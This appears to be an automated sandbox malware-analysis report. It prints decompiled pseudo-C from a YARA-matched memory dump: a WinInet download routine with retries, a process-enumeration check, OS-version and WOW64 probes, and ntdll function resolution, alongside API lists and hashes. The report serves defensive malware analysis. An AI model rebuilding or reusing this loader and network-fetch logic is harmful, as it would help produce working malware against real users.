                                                                                                                                          • Opcode Fuzzy Hash: 405421778b5508f18edbfefd9d6ea1df1ab5ec568141cf9e0783b4aa379c08a8
                                                                                                                                          • Instruction Fuzzy Hash: 47F08C70681208BAEB30EB94FC06FADB678FF44B00F100060FA05A1072E7A16A24EA41
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D4DE0, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 152sleepCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E035D4DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v2052;
				intOrPtr _v2056;
				char _v2568;
				char _v3080;
				intOrPtr _v3084;
				char _v3148;
				char _v3276;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				char _t52;
				char _t62;
				void* _t76;
				short _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t80 = __edx;
				_t79 = __ecx;
				E035D1670( &_v3276, 0, 0xcc8);
				_t41 =  *0x37a1bb4; // 0x1e
				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x37a1bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x37a1c24; // 0x0
				_v1788 = _t43;
				_t84 = E035D4B00(_t79, __edx, _t93, _a4);
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E035D28F0(_t84, E035D5000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E035D1510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E035D17E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E035D17E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E035D17E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E035D17E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x37a1c28;
								if( *0x37a1c28 != 0) {
									_t62 = E035D1740("9dbcf183762872d8917b8a19535a0c65",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										E035D76A0(_t79, _t80, _t82, _a16, _a20,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E035D17E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E035D17E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E035D1510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E035D4B00(_t79, _t80, _t94, _t81);
					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E035D17B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E035D4B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E035D4B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}






























                                                                                                                                          0x035d4de0
                                                                                                                                          0x035d4de0
                                                                                                                                          0x035d4de0
                                                                                                                                          0x035d4df9
                                                                                                                                          0x035d4dfe
                                                                                                                                          0x035d4e03
                                                                                                                                          0x035d4e06
                                                                                                                                          0x035d4e0c
                                                                                                                                          0x035d4e11
                                                                                                                                          0x035d4e17
                                                                                                                                          0x035d4e1d
                                                                                                                                          0x035d4e28
                                                                                                                                          0x035d4e2a
                                                                                                                                          0x035d4e2d
                                                                                                                                          0x035d4e2f
                                                                                                                                          0x035d4e8d
                                                                                                                                          0x035d4e9a
                                                                                                                                          0x035d4e9f
                                                                                                                                          0x035d4ea2
                                                                                                                                          0x035d4ea5
                                                                                                                                          0x035d4eb7
                                                                                                                                          0x035d4ebc
                                                                                                                                          0x035d4ebf
                                                                                                                                          0x035d4ec2
                                                                                                                                          0x035d4ec9
                                                                                                                                          0x035d4ed9
                                                                                                                                          0x035d4ede
                                                                                                                                          0x035d4ede
                                                                                                                                          0x035d4ee1
                                                                                                                                          0x035d4ee8
                                                                                                                                          0x035d4ef2
                                                                                                                                          0x035d4ef7
                                                                                                                                          0x035d4ef7
                                                                                                                                          0x035d4efa
                                                                                                                                          0x035d4f01
                                                                                                                                          0x035d4f11
                                                                                                                                          0x035d4f16
                                                                                                                                          0x035d4f16
                                                                                                                                          0x035d4f19
                                                                                                                                          0x035d4f20
                                                                                                                                          0x035d4f29
                                                                                                                                          0x035d4f30
                                                                                                                                          0x035d4f35
                                                                                                                                          0x035d4f38
                                                                                                                                          0x035d4f3f
                                                                                                                                          0x035d4f41
                                                                                                                                          0x035d4f48
                                                                                                                                          0x035d4f56
                                                                                                                                          0x035d4f5b
                                                                                                                                          0x035d4f5e
                                                                                                                                          0x035d4f60
                                                                                                                                          0x035d4f70
                                                                                                                                          0x035d4f75
                                                                                                                                          0x035d4f75
                                                                                                                                          0x035d4f60
                                                                                                                                          0x035d4f48
                                                                                                                                          0x035d4f3f
                                                                                                                                          0x035d4f78
                                                                                                                                          0x035d4f7f
                                                                                                                                          0x035d4f8f
                                                                                                                                          0x035d4f94
                                                                                                                                          0x035d4f94
                                                                                                                                          0x035d4f9d
                                                                                                                                          0x035d4fa9
                                                                                                                                          0x035d4fb5
                                                                                                                                          0x035d4fc1
                                                                                                                                          0x035d4fc7
                                                                                                                                          0x035d4fcd
                                                                                                                                          0x035d4fd3
                                                                                                                                          0x035d4fd5
                                                                                                                                          0x035d4fe3
                                                                                                                                          0x035d4fe8
                                                                                                                                          0x035d4ff5
                                                                                                                                          0x035d4ea7
                                                                                                                                          0x035d4ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4eac
                                                                                                                                          0x035d4e31
                                                                                                                                          0x035d4e36
                                                                                                                                          0x035d4e42
                                                                                                                                          0x035d4e44
                                                                                                                                          0x035d4e49
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4e4b
                                                                                                                                          0x035d4e55
                                                                                                                                          0x035d4e5a
                                                                                                                                          0x035d4e5d
                                                                                                                                          0x035d4e5f
                                                                                                                                          0x035d4eb0
                                                                                                                                          0x035d4eb6
                                                                                                                                          0x035d4e61
                                                                                                                                          0x035d4e61
                                                                                                                                          0x035d4e6a
                                                                                                                                          0x035d4e6c
                                                                                                                                          0x035d4e6f
                                                                                                                                          0x035d4e71
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4e73
                                                                                                                                          0x035d4e78
                                                                                                                                          0x035d4e84
                                                                                                                                          0x035d4e86
                                                                                                                                          0x035d4e8b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4e8b
                                                                                                                                          0x035d4e71
                                                                                                                                          0x035d4e5f
                                                                                                                                          0x035d4e49

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D4B00: InternetCrackUrlA.WININET(74B5EA30,00000000,?,?,00000000,00000000), ref: 035D4B57
                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,74B5EA30,00000000), ref: 035D4E36
                                                                                                                                            • Part of subcall function 035D4B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 035D4B9D
                                                                                                                                            • Part of subcall function 035D4B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 035D4BCB
                                                                                                                                            • Part of subcall function 035D4B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 035D4BE5
                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,?,?,?,?,74B5EA30,00000000), ref: 035D4E78
                                                                                                                                            • Part of subcall function 035D4B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,035DA200,846CF300,00000000), ref: 035D4C52
                                                                                                                                            • Part of subcall function 035D4B00: InternetQueryOptionA.WININET(00000000,0000001F,74B5EA30,00000000), ref: 035D4C8C
                                                                                                                                            • Part of subcall function 035D4B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 035D4CAA
                                                                                                                                            • Part of subcall function 035D4B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 035D4CC1
                                                                                                                                            • Part of subcall function 035D4B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 035D4CF3
                                                                                                                                            • Part of subcall function 035D4B00: InternetCloseHandle.WININET(00000CC8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035D4D9A
                                                                                                                                            • Part of subcall function 035D4B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035D4D9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
                                                                                                                                          • String ID: 9dbcf183762872d8917b8a19535a0c65$FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                          • API String ID: 581717041-2345166521
                                                                                                                                          • Opcode ID: c6ef20c781091d0e8f4d2573b9f62749e7819a009a9b68cd703ecd2a102bf65f
                                                                                                                                          • Instruction ID: aa2df215ad0fcd94df6e313c605b658413c8caa314f892088e21d2e049904934
                                                                                                                                          • Opcode Fuzzy Hash: c6ef20c781091d0e8f4d2573b9f62749e7819a009a9b68cd703ecd2a102bf65f
                                                                                                                                          • Instruction Fuzzy Hash: 9951A6B5D017165BEB71EB6CFC00FEBB7F8BB44241F0805A5D94896260EF349A94CB92
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D7EF0, Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D7EF0(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t13;
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;

				_v300 = 0x128;
				_t29 = CreateToolhelp32Snapshot(2, 0);
				if(_t29 != 0xffffffff) {
					Process32First(_t29,  &_v300);
					_t26 = _a4;
					_t13 = E035D1740(_a4,  &_v264);
					_t31 = _t30 + 8;
					if(_t13 == 0) {
						L7:
						CloseHandle(_t29);
						return _v292;
					} else {
						if(Process32Next(_t29,  &_v300) == 0) {
							L6:
							CloseHandle(_t29);
							return 0;
						} else {
							while(1) {
								_t21 = E035D1740(_t26,  &_v264);
								_t31 = _t31 + 8;
								if(_t21 == 0) {
									goto L7;
								}
								if(Process32Next(_t29,  &_v300) != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							goto L7;
						}
					}
				} else {
					return 0;
				}
				L8:
			}











                                                                                                                                          0x035d7efe
                                                                                                                                          0x035d7f0d
                                                                                                                                          0x035d7f12
                                                                                                                                          0x035d7f24
                                                                                                                                          0x035d7f29
                                                                                                                                          0x035d7f34
                                                                                                                                          0x035d7f39
                                                                                                                                          0x035d7f3e
                                                                                                                                          0x035d7f85
                                                                                                                                          0x035d7f86
                                                                                                                                          0x035d7f97
                                                                                                                                          0x035d7f40
                                                                                                                                          0x035d7f4f
                                                                                                                                          0x035d7f76
                                                                                                                                          0x035d7f77
                                                                                                                                          0x035d7f84
                                                                                                                                          0x035d7f51
                                                                                                                                          0x035d7f51
                                                                                                                                          0x035d7f59
                                                                                                                                          0x035d7f5e
                                                                                                                                          0x035d7f63
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7f74
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7f74
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7f51
                                                                                                                                          0x035d7f4f
                                                                                                                                          0x035d7f14
                                                                                                                                          0x035d7f1a
                                                                                                                                          0x035d7f1a
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 035D7F08
                                                                                                                                          • Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 035D7F24
                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 035D7F48
                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 035D7F6D
                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 035D7F77
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2284531361-0
                                                                                                                                          • Opcode ID: e49a2cc6ac1b1c8442e61a5825c7997989f9cd66e90da857fbaf4c4a1ed38573
                                                                                                                                          • Instruction ID: 30e54a2a924d7ade2517fa4861d53f2be2b11ae4ffa165bdcff15a52f694f0b9
                                                                                                                                          • Opcode Fuzzy Hash: e49a2cc6ac1b1c8442e61a5825c7997989f9cd66e90da857fbaf4c4a1ed38573
                                                                                                                                          • Instruction Fuzzy Hash: 9F11E97650112957DB30FA6CFC40EEAB3BCEF49221F0401E1ED58D6090EB30DA9546A1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D8CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E035D8CE0() {
				_Unknown_base(*)()* _t2;
				signed int _t3;
				signed int _t5;
				void* _t9;

				 *0x37a2e0c = 0x11c;
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x37a2e0c);
				}
				_t3 =  *0x37a2e10;
				if(_t3 == 0) {
					L22:
					return _t3;
				} else {
					_t5 = _t3 << 0x00000008 |  *0x37a2e14;
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {
							 *0x37a2e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {
							_t3 =  *0x37a2e18;
							if(_t3 < 0x3fab) {
								if(_t3 < 0x3ad7) {
									if(_t3 < 0x3839) {
										if(_t3 < 0x295a) {
											goto L22;
										} else {
											 *0x37a2e08 = 5;
											return _t3;
										}
									} else {
										 *0x37a2e08 = 6;
										return _t3;
									}
								} else {
									 *0x37a2e08 = 7;
									return _t3;
								}
							} else {
								 *0x37a2e08 = 8;
								return _t3;
							}
						} else {
							goto L12;
						}
					} else {
						if(_t9 == 0) {
							 *0x37a2e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {
								 *0x37a2e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {
									L12:
									 *0x37a2e08 = 0;
									return _t5;
								} else {
									 *0x37a2e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}







                                                                                                                                          0x035d8cea
                                                                                                                                          0x035d8cfb
                                                                                                                                          0x035d8d03
                                                                                                                                          0x035d8d0a
                                                                                                                                          0x035d8d0a
                                                                                                                                          0x035d8d0c
                                                                                                                                          0x035d8d13
                                                                                                                                          0x035d8dca
                                                                                                                                          0x035d8dca
                                                                                                                                          0x035d8d19
                                                                                                                                          0x035d8d1c
                                                                                                                                          0x035d8d22
                                                                                                                                          0x035d8d27
                                                                                                                                          0x035d8d5f
                                                                                                                                          0x035d8dc0
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8dc0
                                                                                                                                          0x035d8d66
                                                                                                                                          0x035d8d73
                                                                                                                                          0x035d8d7d
                                                                                                                                          0x035d8d8f
                                                                                                                                          0x035d8da1
                                                                                                                                          0x035d8db3
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8db5
                                                                                                                                          0x035d8db5
                                                                                                                                          0x035d8dbf
                                                                                                                                          0x035d8dbf
                                                                                                                                          0x035d8da3
                                                                                                                                          0x035d8da3
                                                                                                                                          0x035d8dad
                                                                                                                                          0x035d8dad
                                                                                                                                          0x035d8d91
                                                                                                                                          0x035d8d91
                                                                                                                                          0x035d8d9b
                                                                                                                                          0x035d8d9b
                                                                                                                                          0x035d8d7f
                                                                                                                                          0x035d8d7f
                                                                                                                                          0x035d8d89
                                                                                                                                          0x035d8d89
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8d29
                                                                                                                                          0x035d8d29
                                                                                                                                          0x035d8d4f
                                                                                                                                          0x035d8d59
                                                                                                                                          0x035d8d2b
                                                                                                                                          0x035d8d30
                                                                                                                                          0x035d8d44
                                                                                                                                          0x035d8d4e
                                                                                                                                          0x035d8d32
                                                                                                                                          0x035d8d37
                                                                                                                                          0x035d8d68
                                                                                                                                          0x035d8d68
                                                                                                                                          0x035d8d72
                                                                                                                                          0x035d8d39
                                                                                                                                          0x035d8d39
                                                                                                                                          0x035d8d43
                                                                                                                                          0x035d8d43
                                                                                                                                          0x035d8d37
                                                                                                                                          0x035d8d30
                                                                                                                                          0x035d8d29
                                                                                                                                          0x035d8d27

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,035D8DD5,035D3448), ref: 035D8CF4
                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 035D8CFB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                          • API String ID: 1646373207-1489217083
                                                                                                                                          • Opcode ID: 57923529adb47077672126e4adbe60716b04373cc2e4cf943707deaf71b95daf
                                                                                                                                          • Instruction ID: 5455f5a506330974b4b925b491104bb8b568fc9b4f142706646a704646f38829
                                                                                                                                          • Opcode Fuzzy Hash: 57923529adb47077672126e4adbe60716b04373cc2e4cf943707deaf71b95daf
                                                                                                                                          • Instruction Fuzzy Hash: 17111C76288A409AE734FF18F89C71976A5B398701FEDCC94D001C66EAC3FC81D5CA45
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D8270, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E035D8270(void* __ecx, intOrPtr _a4) {
				char _v8;
				_Unknown_base(*)()* _t6;
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t8 =  *_t6(_a4,  &_v8);
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;
					}
				}
			}






                                                                                                                                          0x035d827e
                                                                                                                                          0x035d828c
                                                                                                                                          0x035d8294
                                                                                                                                          0x035d82a7
                                                                                                                                          0x035d82ad
                                                                                                                                          0x035d8296
                                                                                                                                          0x035d829d
                                                                                                                                          0x035d82a1
                                                                                                                                          0x00000000
                                                                                                                                          0x035d82a6
                                                                                                                                          0x035d82a6
                                                                                                                                          0x035d82a6
                                                                                                                                          0x035d82a1

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,035D3432), ref: 035D8285
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,035D3432), ref: 035D828C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: IsWow64Process$kernel32
                                                                                                                                          • API String ID: 1646373207-3789238822
                                                                                                                                          • Opcode ID: d00e70cd9e3619ea808b24bcd8ca40e7bfb393079f97546f7124e9584722acaf
                                                                                                                                          • Instruction ID: a6b71c650db9f3ef5b213d24b395ecfa6dd0025bfbe20376022481bc76a1f750
                                                                                                                                          • Opcode Fuzzy Hash: d00e70cd9e3619ea808b24bcd8ca40e7bfb393079f97546f7124e9584722acaf
                                                                                                                                          • Instruction Fuzzy Hash: 04E04F71645209AFDB20DBD4FC09E6E77ACEB40245F0401D8BC0892120EB719A119650
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D21A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                          			E035D21A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				signed int _v16;
				void* _v20;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t22;
				void* _t24;
				short _t27;
				void* _t31;
				signed int _t37;
				signed int _t38;
				void _t40;
				signed int _t46;
				void* _t52;
				intOrPtr _t57;
				void* _t61;
				void* _t62;

				_t46 = __edx;
				_t22 =  *0x37a1128; // 0x0
				_t62 = _t61 - 0x28;
				_t64 = _t22 |  *0x37a112c;
				if((_t22 |  *0x37a112c) != 0) {
					L3:
					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4);
					_t52 = _t24;
					__eflags = _t52;
					if(_t52 != 0) {
						_t2 = _t52 + 0x18; // 0x18
						_t57 = _t2;
						E035D17E0(_t57, _a12);
						asm("cdq");
						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
						 *(_t52 + 0x14) = _t46;
						_t27 = E035D1850(_t57);
						asm("xorps xmm0, xmm0");
						 *((short*)(_t52 + 8)) = _t27;
						 *((short*)(_t52 + 0xa)) = _t27;
						_t8 = _t52 + 8; // 0x8
						 *_t52 = 0;
						 *(_t52 + 4) = 0;
						asm("cdq");
						_v36 = _t8;
						_v32 = _t46;
						asm("cdq");
						_v20 = _t52;
						_v44 = _a4;
						_v40 = _a8;
						asm("movlpd [ebp-0x18], xmm0");
						_v16 = _t46;
						_t31 = E035D1D10( *0x37a1128,  *0x37a112c,  &_v44, 4);
						_t40 =  *_t52;
						_v8 = 0;
						_v8 =  *(_t52 + 4);
						VirtualFree(_t52, 0, 0x8000);
						__eflags = _t31;
						if(_t31 < 0) {
							__eflags = 0;
							return 0;
						} else {
							return _t40;
						}
					} else {
						__eflags = 0;
						return _t24;
					}
				} else {
					_t37 = E035D22B0(_t46, E035D1E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
					_t62 = _t62 + 0x10;
					 *0x37a1128 = _t37;
					_t38 = _t37 | _t46;
					 *0x37a112c = _t46;
					if(_t38 != 0) {
						goto L3;
					} else {
						return _t38;
					}
				}
			}






















                                                                                                                                          0x035d21a0
                                                                                                                                          0x035d21a3
                                                                                                                                          0x035d21a8
                                                                                                                                          0x035d21ab
                                                                                                                                          0x035d21b1
                                                                                                                                          0x035d21e1
                                                                                                                                          0x035d21f0
                                                                                                                                          0x035d21f6
                                                                                                                                          0x035d21f8
                                                                                                                                          0x035d21fa
                                                                                                                                          0x035d2208
                                                                                                                                          0x035d2208
                                                                                                                                          0x035d220c
                                                                                                                                          0x035d2213
                                                                                                                                          0x035d2215
                                                                                                                                          0x035d2218
                                                                                                                                          0x035d221b
                                                                                                                                          0x035d2223
                                                                                                                                          0x035d2226
                                                                                                                                          0x035d222a
                                                                                                                                          0x035d222e
                                                                                                                                          0x035d2231
                                                                                                                                          0x035d2237
                                                                                                                                          0x035d223e
                                                                                                                                          0x035d223f
                                                                                                                                          0x035d2244
                                                                                                                                          0x035d2247
                                                                                                                                          0x035d2248
                                                                                                                                          0x035d2257
                                                                                                                                          0x035d2263
                                                                                                                                          0x035d2266
                                                                                                                                          0x035d226b
                                                                                                                                          0x035d226e
                                                                                                                                          0x035d2273
                                                                                                                                          0x035d227a
                                                                                                                                          0x035d2284
                                                                                                                                          0x035d228f
                                                                                                                                          0x035d2295
                                                                                                                                          0x035d2297
                                                                                                                                          0x035d22a9
                                                                                                                                          0x035d22af
                                                                                                                                          0x035d2299
                                                                                                                                          0x035d22a4
                                                                                                                                          0x035d22a4
                                                                                                                                          0x035d21fc
                                                                                                                                          0x035d21fc
                                                                                                                                          0x035d2202
                                                                                                                                          0x035d2202
                                                                                                                                          0x035d21b3
                                                                                                                                          0x035d21c4
                                                                                                                                          0x035d21c9
                                                                                                                                          0x035d21cc
                                                                                                                                          0x035d21d1
                                                                                                                                          0x035d21d3
                                                                                                                                          0x035d21d9
                                                                                                                                          0x00000000
                                                                                                                                          0x035d21db
                                                                                                                                          0x035d21e0
                                                                                                                                          0x035d21e0
                                                                                                                                          0x035d21d9

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000120,00003000,00000004,?,?,?,?,?,035D6208,?,?,NtGetContextThread,?,?,?), ref: 035D21F0
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,035D6208,?), ref: 035D228F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                          • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                                                          • API String ID: 2087232378-1174695804
                                                                                                                                          • Opcode ID: 603edc4a2b6608248f67380ff8f7987a1bc6e19c2325cae66feefea40327285c
                                                                                                                                          • Instruction ID: 45ccf5afb3632db8ad3229437d8514ac31c95afecf1715976bbfca3aeee0caf0
                                                                                                                                          • Opcode Fuzzy Hash: 603edc4a2b6608248f67380ff8f7987a1bc6e19c2325cae66feefea40327285c
                                                                                                                                          • Instruction Fuzzy Hash: 8E31A675E01605ABD710DFA9EC41B9AF7B5FFC8310F10C56AE908A7210D77495108BD4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D16A0, Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D16A0(void* _a4, long _a8) {
				long _t5;
				long _t9;

				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);
					return _t9;
				}
				return _t5;
			}





                                                                                                                                          0x035d16b3
                                                                                                                                          0x035d16b9
                                                                                                                                          0x035d16bd
                                                                                                                                          0x035d16ca
                                                                                                                                          0x00000000
                                                                                                                                          0x035d16d0
                                                                                                                                          0x035d16d4

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,035D4D23,00000000,?,035D4D23,00000000,00000000), ref: 035D16AC
                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,035D4D23,00000000,00000000), ref: 035D16B3
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,035D4D23,00000000,00000000), ref: 035D16C3
                                                                                                                                          • HeapFree.KERNEL32(00000000,?,035D4D23,00000000,00000000), ref: 035D16CA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$Process$AllocFree
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 756756679-0
